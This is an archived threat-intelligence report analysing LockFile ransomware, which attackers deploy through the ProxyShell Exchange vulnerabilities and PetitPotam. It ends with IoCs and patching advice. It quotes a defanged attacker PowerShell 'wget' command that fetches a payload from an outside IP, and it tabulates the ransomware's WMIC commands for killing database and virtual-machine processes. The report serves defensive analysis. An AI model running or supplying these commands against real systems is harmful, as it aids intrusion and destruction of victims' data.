{
	"id": "b0bb02fa-96a9-461d-baa9-a895f9f662f2",
	"created_at": "2026-04-06T00:15:40.835385Z",
	"updated_at": "2026-04-10T03:22:03.735789Z",
	"deleted_at": null,
	"sha1_hash": "34b2552f7505c9936c3a7a5a843965a86eec8733",
	"title": "LockFile Ransomware: Exploiting Exchange With ProxyShell",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1905684,
	"plain_text": "LockFile Ransomware: Exploiting Exchange With ProxyShell\r\nPublished: 2021-08-25 · Archived: 2026-04-05 13:50:37 UTC\r\nLockFile Ransomware: Exploiting Microsoft Exchange Vulnerabilities Using ProxyShell\r\nLockFile Ransomware: Exploiting Microsoft Exchange Vulnerabilities Using ProxyShell\r\nCyble's research on the LockFile ransomware that is attacking Microsoft Exchange servers using PowerShell attack.\r\nThe LockFile ransomware was first seen in July 2021 and has been highly active since then. It has global operations, and\r\nmost of the victims are from the United States of America and Asia. The ransomware group hosts a website\r\nin the TOR network to guide victims to pay the ransom and subsequently get the instructions to decrypt the files. This\r\nwebpage contains a uTox ID and an email address to contact the Threat Actor (TA), as shown in the figure below.  \r\nFigure 1: LockFile Ransomware Website \r\nCyble Researchers found that a few details indicate that the ransomware gang could also be related to the other threat actors\r\nfrom the ransomware website. For example, as mentioned in the ATTENTION section of the website, the last line\r\nmentions a wallpaper being provided by lockbit, and the contact email contains a reference to Conti.  \r\nRecently the Threat Actor (TA) behind LockFile has started attacking Microsoft Exchange Servers\r\nusing ProxyShell attack. The ProxyShell attack uses chained Microsoft Exchange vulnerabilities mentioned in the list below,\r\nresulting in unauthenticated code execution. Orange Tsai, a Principal Security\r\nResearcher from Devcore, recently discovered these vulnerabilities. Following is the list of vulnerabilities.  \r\nhttps://blog.cyble.com/2021/08/25/lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware/\r\nPage 1 of 12\n\nWorld's Best AI-Native Threat Intelligence\r\nCVE-2021-34473 - Pre-auth Path Confusion leads to ACL Bypass (Patched in April by KB5001779) \r\nCVE-2021-34523 - Elevation of Privilege on Exchange PowerShell Backend (Patched in April by KB5001779) \r\nCVE-2021-31207 - Post-auth Arbitrary-File-Write leads to RCE (Patched in May by KB5003435)  \r\nAccording to a Symantec blog post, after successful exploitation, the TA uses the PowerShell command.  \r\npowershell wget hxxp://209.14.0[.]234:46613/VcEtrKighyIFS5foGNXH\r\nThe PowerShell command in use is unknown, but on August 13, 2021, an independent security researcher captured the\r\nassociated IP address (209.14.0[.]234). According to the researcher, attackers used this IP to exploit ProxyShell\r\nVulnerability. \r\nResearchers also found that 20 to 30 minutes before the deployment of ransomware, the TA drops three files: \r\nAn Exploit for PetitPotam vulnerability (CVE-2021-36942), namely efspotato.exe. \r\nTwo files: active_desktop_render.dll and active_desktop_launcher.exe \r\nPetitPotam vulnerability allows the TA to compromise Domain Controller, which results in the compromise of the complete\r\nActive Directory. The PetitPotam technique uses MS-EFSRPC (Microsoft’s Encrypting File System Remote Protocol),\r\nWhich is responsible for performing maintenance and management operations on the encrypted data stored on the remote\r\nsystem.  \r\nAs per Symantec, the executable active_desktop_launcher.exe is legitimate software, but active_desktop_render.dll is a\r\nmalicious Dynamic Link Library (DLL). The active_desktop_render.dll is loaded using the DLL Search Order Hijacking\r\nattack. After loading, the DLL file drops and decrypts desktop.ini in a local directory. This desktop.ini then loads and\r\nexecutes shellcode, which then activates the efspotato.exe file that is exploited for the PetitPotam vulnerability. \r\nUpon compromising the domain, the TA then deploys LockFile ransomware in various systems of the\r\ncompromised domain. \r\nhttps://blog.cyble.com/2021/08/25/lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware/\r\nPage 2 of 12\n\nCyble Research found one of the LockFile malware samples from the surface web while conducting routine Open-Source Intelligence (OSINT) threat hunting exercises. The figure below shows the high-level\r\nexecution flow of LockFile Ransomware. The malware initially kills all the known processes related to virtual\r\nmachines, databases, and other related services. Then, it iterates through drives into the system to find the logical drive to\r\nsearch for files and folders. After the files are found, the malware checks the extensions of the file, and if matched to the pre-defined file extension, the ransomware encrypts it. After completing the encryption process, it deletes itself. \r\n \r\nFigure 2 High-level execution flow of LockFile Ransomware \r\nTechnical Analysis \r\nOur static analysis found that the malware is a Windows-based x64 architecture Console application written in C/C++ and\r\ncompiled on 2021-07-03 18:15:34, as shown in the figure below. \r\nFigure 3: Static details of LockFile Ransomware \r\nAs shown in the figure below, the malware creates several subprocesses to perform several activities upon execution.  \r\n \r\nhttps://blog.cyble.com/2021/08/25/lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware/\r\nPage 3 of 12\n\nFigure 4: Process Tree created by LockFile Ransomware\r\nThe subprocess kills various running processes shown in Table 1. The malware uses the Windows Management Interface\r\nCommand (WMIC) command and provides the process name as a wild card in between %% to achieve this task. WMIC is a\r\nsimple command prompt tool that returns information about the system you are running it on.  \r\nThe list of commands which the malware has executed is shown in table below. \r\nCommand \r\nTarget\r\nProcess \r\nC:Windowssystem32cmd.exe /c wmic process where “name  like ‘%vmwp%'” call\r\nterminate \r\nvmwp \r\nC:Windowssystem32cmd.exe /c wmic process where “name  like ‘%virtualbox%'” call\r\nterminate \r\nvirtualbox \r\nC:Windowssystem32cmd.exe /c wmic process where “name  like ‘%vbox%'” call\r\nterminate \r\nvbox \r\nC:Windowssystem32cmd.exe /c wmic process where “name  like ‘%sqlservr%'” call\r\nterminate \r\nsqlservr \r\nC:Windowssystem32cmd.exe /c wmic process where “name  like ‘%mysqld%'” call\r\nterminate \r\nmysqld \r\nC:Windowssystem32cmd.exe /c wmic process where “name  like ‘%omtsreco%'” call\r\nterminate \r\nomtsreco \r\nC:Windowssystem32cmd.exe /c wmic process where “name  like ‘%oracle%'” call\r\nterminate \r\noracle \r\nC:Windowssystem32cmd.exe /c wmic process where “name  like ‘%tnslsnr%'” call\r\nterminate \r\ntnslsnr \r\nC:Windowssystem32cmd.exe /c wmic process where “name  like ‘%vmware%'” call\r\nterminate \r\nvmware \r\nhttps://blog.cyble.com/2021/08/25/lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware/\r\nPage 4 of 12\n\nTable 1 WMIC Commands executed by Ransomware to Kill Processes\r\nOnce the ransomware kills all the processes, it iterates through the victim’s machine and encrypts the user document files\r\nand appends extensions with .lockfile, as shown in the figure below. \r\nFigure 5: Files encrypted by LockFile \r\nOnce the files are encrypted, the malware launches an HTML Application file (HTA) to show the ransom message to the\r\nuser, as shown in the figure below, and then deletes itself.  \r\nFigure 6: Ransom Message Created by LockFile\r\nCode Analysis and Debugging \r\nThe figure below shows that the malware calls a series of WMIC commands to kill various processes upon debugging. The\r\nlist of commands is shown in Table 1. \r\nhttps://blog.cyble.com/2021/08/25/lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware/\r\nPage 5 of 12\n\nFigure 7:  WMIC commands used by LockFile ransomware to kill processes \r\nOnce the ransomware kills all the defined processes, it extracts the ransom note content from the executable, as\r\nshown below. \r\nFigure 8: Ransom Note Extracted from LockFile Ransomware in Memory \r\nAfterward, the malware gets the list of drives using the GetLogicalDriveStringsA Application Programming Interface (API).\r\nFinally, the list of drives is passed one at a time to GetDriveTypeA API, after which the result compares with 03\r\n(DRIVE_FIXED), which indicates whether the found drive is fixed media, e.g., Logical Drives as shown below. Once the\r\ndrive is located, the malware creates a thread to conduct further ransomware activity.  \r\nFigure 9: Fixed Media checked by LockFile \r\nThe malware thread creates LOCKFILE-README.hta in the root, as shown in the figure below.  \r\nFigure 10: LockFile’s Thread creating LOCKFILE-README.hta in C:/ \r\nhttps://blog.cyble.com/2021/08/25/lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware/\r\nPage 6 of 12\n\nThen the ransomware starts iterating through the files and folder. The code passes whatever files/folders are found through a\r\nseries of checks. The checks are mentioned below list.  \r\n1 – desktop.ini string is not present in the filename \r\n2 – \\Windows is not present in the full path \r\n3 – LOCKFILE string is not present in the filename \r\n4 – NTUSER string is not present in the filename \r\nThe checks are shown in the below code. \r\nFigure 11: Checks performed by LockFile. \r\nOnce all the checks are passed, the malware compares the files extension with a pre-defined extension embedded in the\r\nmalware. The code is shown in the figure below.  \r\nFigure 12: File Extension Compared by LockFile\r\nFor example, in the below figure, we can see that the malware is comparing 36897c.rbf extension with .1cd extension.  \r\nFigure 13 Ransomware Check File Extension \r\nSimilarly, the malware compares all extensions, shown in Table 2, with the victim’s file. This activity helps us conclude that\r\nthe malware is targeting only a specific extension file. \r\n.lcd \r\n.7z \r\n.7zip \r\nhttps://blog.cyble.com/2021/08/25/lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware/\r\nPage 7 of 12\n\n.acccdb \r\n.ai \r\n.asp \r\n.aspx \r\n.backup \r\n.bak \r\n.cd \r\n.cdr \r\n.cdx \r\n.cer \r\n.cf \r\n.cfl \r\n.cfu \r\n.config \r\n.cs \r\n.csv \r\n.dat \r\n.db \r\n.dbf \r\n.doc \r\n.docx \r\n.dt \r\n.dwg \r\n.edb \r\n.efd \r\n.elf \r\n.epf \r\n.erf \r\n.fpt \r\n.geo \r\n.grs \r\n.html \r\n.ibd \r\n.jpeg \r\n.ldf \r\n.lgf \r\n.lgp \r\n.log \r\n.mdb \r\n.mdf \r\n.mft \r\n.mp3 \r\n.mxl \r\n.myd \r\n.odt \r\n.pdf \r\n.pff \r\nhttps://blog.cyble.com/2021/08/25/lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware/\r\nPage 8 of 12\n\n.php \r\n.ppt \r\n.pptx \r\n.ps1 \r\n.psd \r\n.pst \r\n.rar \r\n.sln \r\n.sql \r\n.sqlite \r\n.st \r\n.tiff \r\n.txt \r\n.vdi \r\n.vhd \r\n.vhdx \r\n.vmdk \r\n.vrp \r\n.wdb \r\n.xls \r\n.xlsx \r\n.zip \r\nTable 2 List of File Extensions which are targeted by ransomware \r\nAs shown below in figure 14, once the file is found with the defined extension, the malware reads the plain text content from\r\nthe file. \r\nFigure 14 Read Plain Text content from Victim’s File \r\nIt then calls another user-defined function for encrypting the content using Advanced Encryption Standard (AES), as shown\r\nbelow. \r\nhttps://blog.cyble.com/2021/08/25/lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware/\r\nPage 9 of 12\n\nFigure 15 Call Encryption Function to encrypt the content \r\nOnce the content is encrypted, the malware writes it into the file, and then it appends the encrypted file with\r\nextension .lockfile using MoveFileA API, as shown in the below figure.  \r\nFigure 16 Append .lockfile extension to the user document file \r\nThe same activity is shown below in figure 17.  \r\nFigure 17 Append .lockfile extension to the user document file while debugging \r\nOnce all the files have been encrypted, the malware creates a ransom note .hta file in the C:UsersPublic directory, as shown\r\nin the figure below. \r\nFigure 18 Creates .HTA ransom file C:UsersPublic \r\nOnce the .hta ransom file is created, it calls CreateProcess API to launch the .hta file using mshta.exe windows\r\nutility. The mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. \r\nhttps://blog.cyble.com/2021/08/25/lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware/\r\nPage 10 of 12\n\nFigure 19 Launch.HTA ransom File using mshta.exe \r\nFinally, once all the files are encrypted, the malware deletes itself by calling the del command, as shown below.  \r\nFigure 20 Use Del command to delete itself \r\nConclusion  \r\nThe threat actors behind the LockFile exploit publicly disclosed vulnerabilities in sequence to attack Microsoft Exchange\r\nServer and then use PetitPotam vulnerability to compromise the Domain Controller. After achieving these two\r\nobjectives, the TA drops the LockFile ransomware into the systems. \r\nBased on the ransom notes, we speculate that the TA may be creating unique custom variants of\r\nthe LockFile ransomware for each victim organization.  \r\nCyble Research Labs continuously monitors the LockFile ransomware activity; we will continue to update our readers with\r\nour latest findings. \r\nOur Recommendations \r\nWe have listed some essential cybersecurity best practices that create the first line of control against attackers. We\r\nrecommend that our readers follow the suggestions given below: \r\nPatch the CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207 as soon as possible if not patched already.  \r\nFollow KB5005413: Mitigating NTLM Relay Attacks on Active Directory Certificate Services (AD CS) guide to\r\nmitigating PetitPotam impact. \r\nRegularly perform a vulnerability assessment of the organizational assets, majorly which are exposed on the internet. \r\nUse a reputed anti-virus and internet security software package on your connected devices.     \r\nConduct regular backup practices and keep those backups offline or in a separate network. \r\nRefrain from opening untrusted links and email attachments without verifying their authenticity. \r\nTurn on the automatic software update feature on your computer, mobile, and other connected devices wherever\r\npossible and pragmatic.  \r\nUse strong passwords and enforce multi-factor authentication wherever possible. \r\nMITRE ATT\u0026CK® Techniques \r\nTactic  Technique ID  Technique Name \r\nReconnaissance  T1595.002 T1591 T1593 \r\nActive Scanning Gather Victim Org\r\nInformation Search Open Websites/Domains \r\nInitial Access  T1190  Exploit Public-Facing Application \r\nExecution  T1059.001  Command and Scripting Interpreter: PowerShell \r\nDefense Evasion  T1574.001 \r\nHijack Execution Flow: DLL Search Order\r\nHijacking \r\nhttps://blog.cyble.com/2021/08/25/lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware/\r\nPage 11 of 12\n\nLateral\r\nMovement \r\nT1210  Exploitation of Remote Services \r\nImpact  T1486  Data Encrypted for Impact \r\nIndicators of Compromise (IoCs):   \r\nIndicators \r\nIndicator\r\ntype \r\nDescription \r\n354a362811b8917bd7245cdd43fe12de9ca3f5f6afe5a2ec97eec81c400a4101  SHA256  LockFile Ransomware \r\ned834722111782b2931e36cfa51b38852c813e3d7a4d16717f59c1d037b62291  SHA256  Malicious DLL \r\n36e8bb8719a619b78862907fd49445750371f40945fefd55a9862465dc2930f9  SHA256  Driver file \r\n5a08ecb2fad5d5c701b4ec42bd0fab7b7b4616673b2d8fbd76557203c5340a0f  SHA256  Malicious executable \r\n1091643890918175dc751538043ea0743618ec7a5a9801878554970036524b75  SHA256  Malicious DLL \r\n7bcb25854ea2e5f0b8cfca7066a13bc8af8e7bac6693dea1cdad5ef193b052fd  SHA256  PetitPotam exploit \r\nbf315c9c064b887ee3276e1342d43637d8c0e067260946db45942f39b970d7ce  SHA256  LockFile executable \r\n209.14.0[.]234 \r\nIP\r\naddress \r\nAttacher’s IP \r\nAbout Us  \r\nCyble is a global threat intelligence SaaS provider that helps enterprises protect themselves from cybercrimes and exposure\r\nin the Darkweb. Its prime focus is to provide organizations with real-time visibility to their digital risk footprint. Backed by\r\nY Combinator as part of the 2021 winter cohort, Cyble has also been recognized by Forbes as one of the top 20 Best\r\nCybersecurity Start-ups To Watch In 2020. Headquartered in Alpharetta, Georgia, and with offices in Australia, Singapore,\r\nand India, Cyble has a global presence. To learn more about Cyble, visit www.cyble.com.  \r\nSource: https://blog.cyble.com/2021/08/25/lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware/\r\nhttps://blog.cyble.com/2021/08/25/lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware/\r\nPage 12 of 12",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://blog.cyble.com/2021/08/25/lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware/"
	],
	"report_names": [
		"lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware"
	],
	"threat_actors": [],
	"ts_created_at": 1775434540,
	"ts_updated_at": 1775791323,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/34b2552f7505c9936c3a7a5a843965a86eec8733.pdf",
		"text": "https://archive.orkl.eu/34b2552f7505c9936c3a7a5a843965a86eec8733.txt",
		"img": "https://archive.orkl.eu/34b2552f7505c9936c3a7a5a843965a86eec8733.jpg"
	}
}